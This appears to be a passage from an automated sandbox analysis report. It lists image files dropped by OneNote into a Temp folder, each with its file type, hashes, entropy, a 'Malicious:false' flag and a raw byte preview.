                                                                                                                                            Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..C.IDATx^...Uc.._"oB.Hr.m(.0......r..[1.D....R..q)%FBDiB.."w*.k.Jz.Y..l....>...9{.......g..Y.z~..k?.z.^k..+V...! ....(.....\sM.tD@...!P...HW.S....u^.....@.r.^.....B@...U.H.J....... }....".....>....! ..A@.4..EE...! }*...B@....i<8.....B@.T2 .........xp..! .....d@...!......(*B@....S....B ...O..QT........! ..@<.H......! ..O%.B@...x..9...C'|..{.>Z../~^.s<<V4..ujo..v.Z7..EwT.....@.....?.......~{...K.........C........bB@.$.....C.{....Kf'S.....T.*&....@<.....'..D`...;~v.DT]...r!..>....ru...}.....#uG.T.....>..z ...3v....P.M.....5.@<...?....F.}..c.W[.._!P...O..>.M.d<..J....E .}ZZ.+.5v.p>..N.{B....>M.Nzfb...OB@.." }.D.y...IdK<..! }.:.....f.K..bX.T9...&T.&?.VB9.[B@..@@.4..1}.4.@H..-!..}..~M.<.z..I}.G....>..S...N..@yj..n..s.d._.....(..R"....Wf\.oO.^...\h.\.`)...ni.'.].vk.1-.k.^....#.,}.{.RM...~Z.S.. .@U!.&}......h...{K..@.........W.8.N.s.Y.0)..f+...%4.......5.@j.):k.+3...I..(

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{EBFE871B-D19B-4781-B924-D6B816E7FBEF}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 167 x 92, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4181
                                                                                                                                            Entropy (8bit):7.943341403425058
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:b6JWqvCl45Da8kuGzhRwZvwIutfij19MQ8EpW14LBGJVCq:b6JTCl45DalsBws1R8914V5q
                                                                                                                                            MD5:817D5A35EDB2B0E052194D4F49FDA19C
                                                                                                                                            SHA1:FA6CB2016C5F43B76102B63D60359139227E07EA
                                                                                                                                            SHA-256:0A87B8418B7F8E6E117BADDA11D7CDD38B8B7320C6BA3D3E9AF93EB9ACB2CE14
                                                                                                                                            SHA-512:E0686BDBFC589401F0EAAE2B1598199EFA285F8392742B1C928B9274088804B23DCB584B6FEF68CE6D7E54DFF9C10338104F4C0F3F80A04471F0B2E8F9935CC0
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......\......!2a....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]iPTW..iv..D.....%DQ#A$...d..h,.T~..+...TM\cj*.)k.fj~L~$...L&...,...:.FdU..f_......._.n.m.....q.s.9.=..w.9......$..b.*..%....@A]A..%..<......l.h.+../..OSe.....]...>..C........^cCy.0nz.4<......g..?~..>.1ws.B....07W65.74T....=..v.......D....6.....tR....}]}....4z..^....7..;.."......^.....|=.#.=.32..o.<.Tn*Q....g.zN...n*...!/.........!....F..]...6...m...CX..~...+..U...E.|.........7]=rE?i(..$`e.%.`.....w._.Y...l.1...@....t.P..=.}..*...N...N.|.xS.5&.....Pe......Z.Z^XJkx.....^.....?7..._....Wsz......}G..]...\.....,[.y....}.J....'.R?a...G5..l.i.?....MH..l.DC^._.c.m.....%{;z.&.*+x;...S.....zxyH..`.._]...el^........U.T..^..p..z[.6(2x..,#;o##..}Zv|Z..............V.....0}Z....]..m.....x..).k]&e.._.W!Vry..%...I..d..}w.....^..\............m[.^.3r.......-8......j....>...Q..T..{\V\ptH.?........1..w....FHl...x.....\.`.ei.w..)`...g..V{..Z.....8..........o.._..

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{ED233EE9-EDE8-4D1A-8458-53FB52356270}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):3679
                                                                                                                                            Entropy (8bit):7.931319059366604
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:tT+LtoQ9jsUBsnwlDGThUe8ww2iJiGEjdKKnnE+Gh:V+Ltt5GwlDQhUe8ww2iJi7MKnnE+K
                                                                                                                                            MD5:995CEACAD563F849C4142B6A6F29F081
                                                                                                                                            SHA1:44CB3B867CD2917541B7D5AAED2F14F10FEBB0FD
                                                                                                                                            SHA-256:3691FB8C60EA1B827092F05FBB1807E34726016C6FF56698D7B81C44D519D22A
                                                                                                                                            SHA-512:3C8EFEB966B075D06D8344483352BF92C9292F9970C9377BE254EB355EFAF017916737AECCDC704B84D532B7229F9908951A6F2CC3FAD810791CAB224401AD3D
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....W...Gh...k.Hm..J.m....,X...Eh..%.n.....PHvy$%...[...R..l...(/..-..yl..Z.h..H!.../.|.y|w...7d3s.s.=.{.s.g.6W.^..)..@..{..'O.LL.......c.^.6xS&O.,...J.(|?...............,.$......@.zk....,.$.........)..7]O...mH7..0..|..&j..t..F...T...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H....W.6.....0...FTcc.Wi....Q)...<.*.....{...#G....Y.f....KKK..,,,4.....{S.`...+O.[..+.\H...(.<..Qy*..ET.PM...c....~(.g..**...ol.K......Sc8..q.F.KM"<...:t.O.>b..$*t..].........2..y.h."!f.08hT..m.(..C.7n.......@....SVUU).F.).X\\....[j.U....$x$d..e...<.W......=;0L78t+..Gw..-....]......C7......K.w..._..g......A.&M.$^.#.!....e.\.P........;vD..@...Za.@*D..f...! .2w...4#.J..c....K}....F.u.I.b.V2.k...5..`....*........M..!.,.;.E..BZ....K..[7....5....,...........K...7+.6..o....\,`...z..5x...\46x.b......Y....s.^.x=.e.4s.W..t,.iu.G^.....(74....`.....:......]..&..j+t9..3..}..

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{EE1964B1-8E7E-4682-A663-3C147510D247}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):52945
                                                                                                                                            Entropy (8bit):7.6490972666456765
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:cjvqR0XvFaGCTJffi0tgybmWDoTw71kHUAnjvawrlp2+NUO8dWSNl3PF2PjK/q09:cyRffflgybmWoTw1UUADHUbU21MjpAD
                                                                                                                                            MD5:AD003F032F32FAC4672D4CE237FA5C5B
                                                                                                                                            SHA1:AE234931B452F0D649D91291763B919CF350EA49
                                                                                                                                            SHA-256:ADB1EBBE18D6CD8FF08AA9BF5C83CDB83BF9AA179698E34E93DBCDDE12F04D32
                                                                                                                                            SHA-512:ECA25FA657ECE3A66D3E650628E0F65D3BADD38864C028AB6553950A1A66D7D55482C85E9E565573E9E5AAFA91C2D53235971C644A266D41EB69F8E72E3A843B
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!1..AQ..aq....".....2....BR#r.b3$...C.Sc%...s5E......................!1.A..Q.aq"...2...#...B...Rb3..$..CSr...6............?......y_N.e.H7?........W..w....k|...S..d.4.>.RW5z.$.i.)V.O....>o...c..*&1.D..O..".ufbb..1...t..u=..K...m...~.....F..-.fb:i..=f..C.w.[{..~.7k....;..:..3....4.....$..m]...}....~q...9T.#..7.~..8...q.N;c..ffo.w...W..d........../t_........lWJE..).>..v;:=....Rrw#.m.n.n...E...vm.J}2N*..|.4...80.#..e....t.J..ZQ.x|g/....F..e....k+vK...M..W.X.e.L..~...j.....kz....=...n:O.:..[.L,.+R...Y..zKNI....,..{e..U.'...}.......|..t.]...~...b4......_.i..../.......m...a..n...v.j.?..Rc.$G|.31..#..$?.........h.w....-... .a.%z..u......u.A....Fm..J.......G..[...w.....:....w/.

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{F01966D9-9113-40FA-A0AA-411890B74228}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 162 x 89, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4081
                                                                                                                                            Entropy (8bit):7.943373267196131
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:KQJAeRumk2zXWySlEmWL9zi6wknB4qLx+ppNhQrW8Oy:Ke9S482LE6wQB6pNeqi
                                                                                                                                            MD5:29B87BEEC5D3899824AA390530CD47FB
                                                                                                                                            SHA1:55108E8E5692E4444F72EE5CEB91915E7A2AEFC8
                                                                                                                                            SHA-256:F00E4F1C9B1D9ABEAAEC8E5CAB02A07FD74F00ACE15E36C6F6469DE5AB07A9FC
                                                                                                                                            SHA-512:1A5AD45BBA8C29C32CDD3C4D1E460C30ECA305D851FAAC73DF165306BC338337525680B9906D367A0CD3852B9D2DAAA8FD0603276BA969495B4E29C7EC8A3530
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......Y.....2.h.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].LTW.f..O.a.......*.....k...M.Z.n.q.h....ht.f.M.n.6..t.h.k.h5.6][[....X..p...?..g.`..7.o..of....^.ys..{.{...s.UMMM.(.l.@.l..R?.......(0+0.......5...*.F..#.].........1.....B[>[..a..L.....x...0.5t.v..S.h!.........Y....B..&.......f#.w5u...............0...x.sC....a.4j5V..Z..n....K..>...3t..wm..3hB.BD.P..FkcJ6.....O........7...S.........6..P.]mf.+o....w..<.......Y..Z.whd.....*zf+.....#."_?....`.._... qf+.?.?"k...zgME..j..!.k.U*.....&z..N....ma.......R.{.r0.S..KP..fU....g~..=..Q.n.*.* 8T=/'9,*.KDW...GN;0(P3_....1......'.;..;|.L.a.&<*\.d......o...Y... {E.F..}.e.\..=W..#..W....c./~..b.EWXI.#.''&.........:....X...b.....+2...5..6+)we~ja:lZ.d.Ey....l.2.5r........!.!._|.A.....j2.5.o.....WOM....V......GC9..'.... ....C..,._...cS....b.1.....t.........._........a.3..K..>V.f]...~....K...-........#.o.Y.P........a.7..,#..'s...T.....b..]..3..dPPP..Y.i...c.b

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{F1277645-A19D-4233-AD34-78F06EED0A45}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:15:20], progressive, precision 8, 604x784, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):140755
                                                                                                                                            Entropy (8bit):7.9013245181576695
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3072:i/aDiblRsFcOco8dofE5Zx1+NQI8Wh9aiOe5NTO:mnbM+TxaAi98W3aiOwTO
                                                                                                                                            MD5:CC087700C07D674D69AFDFDA0FA9825C
                                                                                                                                            SHA1:F11113DF69DACDB255C6CBCFB29C1D1CCE40B346
                                                                                                                                            SHA-256:A7FA7F092EFF43030A56342C39A765F8D5CC48C7DB815DDFC8C1E5EC40117FAE
                                                                                                                                            SHA-512:843202D975EFA91E73287052A893584B6E5AE601F91612B56539AA2F73D1AD3F997FCAD1E711E0F483A2E91D46D9643D0B026B43F4E94116A5D2FB6551536034
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:15:20.............................\.......................................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................{.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?.......J...\O.,......../$..........OE.m.o......T....Z..l.g.-....m.?...Y....3......"....].j.X.k.S.k.....4..R....{....?F.

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{F16376A2-09EA-4B5A-8DA0-36467A3433E9}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 452 x 277, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):22634
                                                                                                                                            Entropy (8bit):7.974332204835705
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:5ojjyi45m1/9gyhgFsH1ud103Pl39o0qjfsH37mNHy7QPaNbZy0:+r45m1/BWKy10tN22rmNHycobE0
                                                                                                                                            MD5:548D234C9AB4021CA5FAB7BF22502465
                                                                                                                                            SHA1:2F7495D250DC86EA99473CC342D164B859926021
                                                                                                                                            SHA-256:7D549C3418CD90F42571D00936B23D242837CE2A8B19FC4C719E182ECB2624C6
                                                                                                                                            SHA-512:261523F5EAE6FCE2829B53AAC5938B1A0021C119E00CE82EFFDBD690FE71064E0F3B313ED1AB2F67A16C488AD5B1A91F5AF98029D88A7896F271C108410D42C5
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.............._......sRGB.........gAMA......a.....pHYs..........o.d..W.IDATx^..i.=YY6z@..DP.i.IAA........l.Dd0"p0.ON.~....s>.?zbH8..%$`....b7..=....25*.".L. ..u_..f...j.........Uk..^UW]...u..}.{.]t.-.(...J......e...t.....@i.k......_.(.....@...Z.6J......2.O.-P....._.u.=T..4p...e..q..5^f~....@i`....?.....@i..k.........?...u..O|bN.~?MbT%...@.LO.Or.`....$..y.{..o....~..(.;......SNi...6....w....~.{..^w......~.S...g?../|.O........7_...Oj....|......40......9....?..<.3nw...x...g...7.....(<.d...(3.K...;....\..:...'.5.....&...>...t.;....8..SO;../...._.}.{..D.jt.......jc...s..........Z...0q...@......Z]S.(..o.....Og.u.l.i.-.9..)j..~...5.l}..........G......k....Z..c.....}.c.?.\....t+u...15p.....[|......2..;..;...........w...........v.7...I.-w...K/.J...[..N.....W..U#...._.j(...//z.|..kv....];j|../m....t.9.;-0.:.4p..@K.....~.9.$qu.E....!.9|.m.+`).|......x..vak-].../.....G'....4.>B6$.......-o.q..L;*.N+....>...=.!.Y..Q...?......7..,....}

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{F1F07128-76FB-4645-8821-99191CE851DD}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 262x277, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):3555
                                                                                                                                            Entropy (8bit):7.686253071499049
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:/h3JeYCQV5Hn++9HBdAjU78S/mjLLwqnqahJD:53Je8b+EBdAjm8S/mjLLRnphJD
                                                                                                                                            MD5:8A5444524F467A45A5A10245F89C855A
                                                                                                                                            SHA1:ACE68D567B02B68275E0345C86DB1139C0EC1386
                                                                                                                                            SHA-256:7D2B01F17354D9237A6AB99D5B9AFDF0E1CC43687125848B0C2DEDFB44CE3843
                                                                                                                                            SHA-512:8151B447B60D110C32EC1EF286B941FFC09B99140F41BBACF5A1650A385FF4D13C0DDB2878E9A470FC7CFCC95A1AB6E44F6DE72562B0FFE093DC8A3C3C7FCC14
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222...........".......................................2........................!1AQ.a."2q.B..#R...3C................................ .......................!1.AQBq............?........)&vD.)3Hn*..X+....r...tmL.k..(.E...R. .Z..&...,fJ...!...6..S\t3.=...g&..Bqe.)_U.....1......-..fl.................J...u.i.mU..K..v.w.0O..E.h..D~K.(..9.,8..E.}.............i.\.....t."v..q..C............<..|3.........................*Q..../c.....f.}8....D..|k..Z......0..~..c..e..m(...|.c..'.5.5............==bx.5x.8...T;....=.--.pc...I;.V.m..,(....}...NH.ho....Q..U.E$.~...w.t>.S\....'f.{.+.g._.t....;>.....P...........-..G.h..2...J.% !.E97Ir.D..N....j...oE._...._...".?.......#".S.........Q.Tc.I..*I..k.......=$.........sk1Jp.\K.....F.3.Q..q..J....N..[l.&....OR4bB|..2ul....J...B.$&H..9#j.f.n./........?R~....B.I.@..........m

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{F1F0BA0F-FF9F-479C-9EE8-EDB1B85B19A7}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 95x498, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):3009
                                                                                                                                            Entropy (8bit):7.493528353751471
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:aRCTf+0hagMrbAZMJShPdvF/5OzlQFlDF7npkDdWvVBTEnBLT6NrgCX0:D+0YgMrApL553JtEdEVcL2NcX
                                                                                                                                            MD5:D9BD80D40B458EDB2A318F639561579A
                                                                                                                                            SHA1:83BA01519F3C7C1525C2EA4C2D9B40F28B2F2E5E
                                                                                                                                            SHA-256:509A6945FACFB3DDC7BE6EE8B82797AD0C72DB5755486EE878125A959CC09B59
                                                                                                                                            SHA-512:C368499667028180A922DD015980C29865AEF4A890C83E87AE29F6A27DC323DD729E6FB1C34A2168A148E6A7A972F65A5FC8ACE6981AF1D4E7057D99681CB366
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.....H.H.....C....................................... ! ..''**''555556666666666...C......................&.....&,$ $,(+&&&+(//,,//666666666666666........_.........................................:.......................r.!12BQ...3Aaq.."CRb.....#4$c.S.....................................................1A............?..p..-.....u0$.......l......)..o.FTd..DG....... .t*e..jO..Z.U......r..j.O.,..VD./.....V5D.&......A..Zi....E.N....*..........#..M<|.2.Y.../QO.x.cTM4......+.F;V.x.de*....]e..O.x.c\Y........r..j.O.,..T...hw..k.^.[B..J.sEl.w.x.m.5%zzt0..T.......b..<\.3Q..W</..!.xh6..Z..\.+M.o.Y..1............#.........|.a.l.KR>..U......e....@...\.1Z...Y...[....F.6.t.#..Z,.x.Q..[`.X......#........W</..TM..-H...V....Tf..........r..j.x.df.f.....#..l.KR>..U......e....@...\.1Z...Y..Y.us....D.)....Uh....FkYm.m`P...W .V.g..FjVj.\..1Q6.t.#..Z,.x.Q..[`.X......#........W</..TM..-H...V....Tf..........r..j.x.df.f.....#..l.KR>..U......e....@...\.1Z...Y..Y.us....D.)....

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{F217636D-C622-4F19-A45D-80D8587C4148}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2210
                                                                                                                                            Entropy (8bit):7.86853667196985
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:naUvGemgl0W5KMDRLEbGAnaHC7ew/fkDSCcE5FTaHWc:aerVlDRIewkXlrTa2c
                                                                                                                                            MD5:73E38124F94AD20A2F1571FBBE11AEEC
                                                                                                                                            SHA1:87FB8056DC7A0A3B70D51426771C4CCE2099CFE5
                                                                                                                                            SHA-256:A700B63B30CBBE5230CC5E977D651E178EA87E73EAB18C8D5FFB1362149ADDF7
                                                                                                                                            SHA-512:320FCE64DD6F975384BEC9267348CD5CD24A55B13BB09FEF1238C2216AD8ECABDCCC15601A079CE092ACFA4954829FFEB06FBB0631F6AE26E3A39E43C102048B
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR...;...=.............sRGB.........gAMA......a.....pHYs..........o.d...7IDAThC.yL.w...r..r....... ...Eq.nnN..i..[.e...-.d.M.dn...x.xmQAT.Q.RN9..EA.k..P`..=}..m.&~............oy....k...}}x..[....g59.}]...~i.SY......."....7Ow../......2...3f)n{..R..R......U?......O.{....c..pT.\.t....5.07.. .....07...7.o..,+.,.V.c...&..%.3I.....:v..\....6.....??..[.N...........nz..Z.B.........v.prs.q1V1|..=':..`.bz..%s.cf.3..RyMNUeV..J.k.}D[~xo..d..c...sO.y\....B...c.07......Rp..J.......{b.......;u...s....N.gko.M...;6...6..c.X5.S..o..\....^).....(......y.72.^....s%...[.q!&Z....C-..+o.....I.....,Y.{......g.1.0..I}.....<.....T..}....t.!x&)..[.7....4.5..{....n.<...#I...:.....r.wW~..zr..9k.^.]KR.*W.J.n.")....%0...)...Fbb5`4'.X..E.../.t.&,t(...@9....\$..........].P..jdU......H;.$.'%}.l7........y..$.....Z..4.Cm.u#&.%N..1..+..8....y...U.(.T.....}.I..5r}...!..K....>f..3.C.G..X1.(<.Gb..b(....0Qv0F.......n.z.s.Y......\.,.h%1...QU..%.}B|CW......sO..\.=..&3...,.

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{F23CC41E-9A20-4E03-AA69-37107826316C}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):239
                                                                                                                                            Entropy (8bit):6.541057503179854
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:6v/lhPKLMRFj+8y6aoBRQcXgTxmRZnh80Ij3Xcnup:6v/7iQE6fwTsOWc
                                                                                                                                            MD5:088833D5A4FDCD105A34657922326F76
                                                                                                                                            SHA1:2A85EAA5121E27D6AA8F9D0C9D4C50620126D04A
                                                                                                                                            SHA-256:F3148B2CF70D225A76261E270E734F55D484D9ECF00B2DBD052D52FE40BD636C
                                                                                                                                            SHA-512:B988C05CB0192EF03603D002AEAA790016768039ED3177932E5CB2BBAD988E6EBD83B2DB9D4A2F0761FDFFA49EE28C8DD4494CEA77DFAC1BFB58DC1DADFDEF91
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR... ... .....szz.....sRGB.........pHYs..........o.d....IDATXG.Q.. ..m's7.h.d.....C..1.. ........H..s..@.t....... ....E...@..n......)*D.z.}..v..P]..J._.:Q.Ft..........,.E...."P..@.X.'..`f.....e3/..]'$..qK7.....IEND.B`.

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{F2E50638-30C8-41C4-B680-477A5C464DFA}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 221 x 77, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2599
                                                                                                                                            Entropy (8bit):7.903700862190034
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:PmCwDJh8w9JewaF2zQNXXj8zq1KM43sxXxjYbTgJW1MFsrJ075CawGjGj:P1Ah8UewaFcgz82Kx8xXNYb3id/yj
                                                                                                                                            MD5:E88131C9AAC52649FF044905ACAB9B76
                                                                                                                                            SHA1:34AE73B9165CBED0DDF33AC20E4B3E7D622C19BF
                                                                                                                                            SHA-256:30F22340F582F9A352A7ED3048D1088F178E83CCAACAC1CCFD86852C8F9C78E3
                                                                                                                                            SHA-512:97AFE8F3A2A3138613934AC737C390A35F6757BFC3D381EA7C7CD148F739932380DCD46D0BA6F590C274F8BFB4D4286B3C0433AA69E090102A8A9ABDD7C97EB1
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......M.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]kl.U....B|E..>...*..Q........b[.K........m.(..... ...!%1%*-B.C~(&`[.....-.....~.w3..Kw.3wvfzn.2{..s.....{w..\....!.3..:..!..../..zD.x...O.K... ^.1*...8.G...z...D.$...........>!..V..`v.CQQQ!..-L...../3.2......ZH.?s...Iu\N..,3.?.p..N......<....E.<.=z..Iu<ll.dX...g....+.{X.p.....:..t...a...cKK.|...Yszl.N.:......KPs.):).T.5...&B...*..5j``@...(_r.V.j..m...?x.sg...t\.dz.'^.=.\.h..<.y....:.I...w..ze.m.\.qPJu.....D.|..@......W..t.+.....X....e....\H+.Ns%^r.VS.N.3:...&...._..#^....d! ..F.....xc..M...q...17.z...z&C...K9(.Ifm.35.v.>.'X,...p.:=.H...J.K.,...:~...7.t.....R..R..9..?....l../.(...0z0.M.f.)H..Y_"e......B........L...q.K......|;..L.........xI.K3.M..%........./..){....R....s...7....).q.._R.4O.a3......<..%....3#.|>..y...u...R'.P..$Klz...........,...g.....`.7..\...x>.{p\;>+.,.....e.-..Re@.N..FY_....*....]}...[..h.M.oq.S.U...c_}`......8TP....

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{F31D04D0-3E36-45CE-9252-597F39AAAB34}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):14553
                                                                                                                                            Entropy (8bit):7.951135681293377
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:EF7aDrPYJ1n3kaEf61xD+KvdokCixTQm7QA96dNT:EF7a/PMeaEf61lT6kCiFQCQq6zT
                                                                                                                                            MD5:3E9F7D399DF9CAD3669B7A5445EF7074
                                                                                                                                            SHA1:2FBC965DC03EF9203581F595E0D7AB1734726ED7
                                                                                                                                            SHA-256:76C80E31F37248C3C787F7972A7B22038390F9D81E72E650071A6F36D36AF27A
                                                                                                                                            SHA-512:326F8F9CBF829BF80AAA96062A57255A36EE04DE310634327AA075D14129CFA8E36E48AB2A00B10F9BDC1D94F1AC7A9E41D0D063361920A0332EC124BDF4C3EE
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..8nIDATx^..xT...!=!$..%t..H.tP:.HQP@E,...QQ.^.....* E.(" ]:.K..R......p..n.9{...sv.}.....7.....o..z...,|.......M +.....w........O...>.SJ.O...<...{. .x..g..I..H.......V .. .}.PO..H+$@.$@=.=@.$@.......VH..H.z.{..H...!@=.#...............C.z..GZ!.. ..)... .....T...B.$@..S..$@.$....>.i..H......H..H@...S}8......POy......>....p... ...... .. .}.PO..H+$@.$@=.=@.$@.......VH..H..zz?.......$@.$`i......c;.n..i...0..........<......S....w..c.....y..F4.p..3~..|.]....s.6[..H...N@.=M..|`...3./...I.....'..|..K...r|...nX...'.. .G...ib|...MY8|......9x..Ur'.. ._ .....5..H..d..L.$@..I..o.;kM.$.?........K/.wn......Y....E..%K*.=.......Y.3.!k....[V..WG/?i..H..." T.,z...6h.[..-%9....WMY...z.vH..H@/.BOe....g-P.@.......lH.O...SJ}5.|....?.^..5^}..$.. .....S.@...*<.gJT/......_.R.C.....rj..Cg'\K........K....~Y....l@..)..l.k.s..Yr.....Z]jG..q.+..G...;lNJj.}..T1&&.. .....?...|....W<{...g.&'Ca

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{F32240FD-0325-45EB-8FFB-F890487E245E}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):11886
                                                                                                                                            Entropy (8bit):7.946442244439929
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:sqNuEpzsnKxkfLaZCdMh+cLApmRausyZwYMAisQKShDBlhr34ckckcZ:JNu6DMLaZsMhtLAIa0wYMAvI5V4DDQ
                                                                                                                                            MD5:875CFB3B5C3619253223731E8C9879E5
                                                                                                                                            SHA1:6372F4F5BEB6EEAE3EDBE5B62EE73039B40AD01E
                                                                                                                                            SHA-256:CC69BAE5D2C8F56B28BA4E3C6A11F57C4E8CCCE69943ACFBE7E63B4FC90EE5F2
                                                                                                                                            SHA-512:47F45A3275B8454F8000F4567153DD7D4AF3012005D8E34CB18AED6AD69083BEC753E607F275FBF3EFCCB7BA00310A04ADFBD5FA5B73E6BBE47CE73901C35CA8
                                                                                                                                            Malicious:false
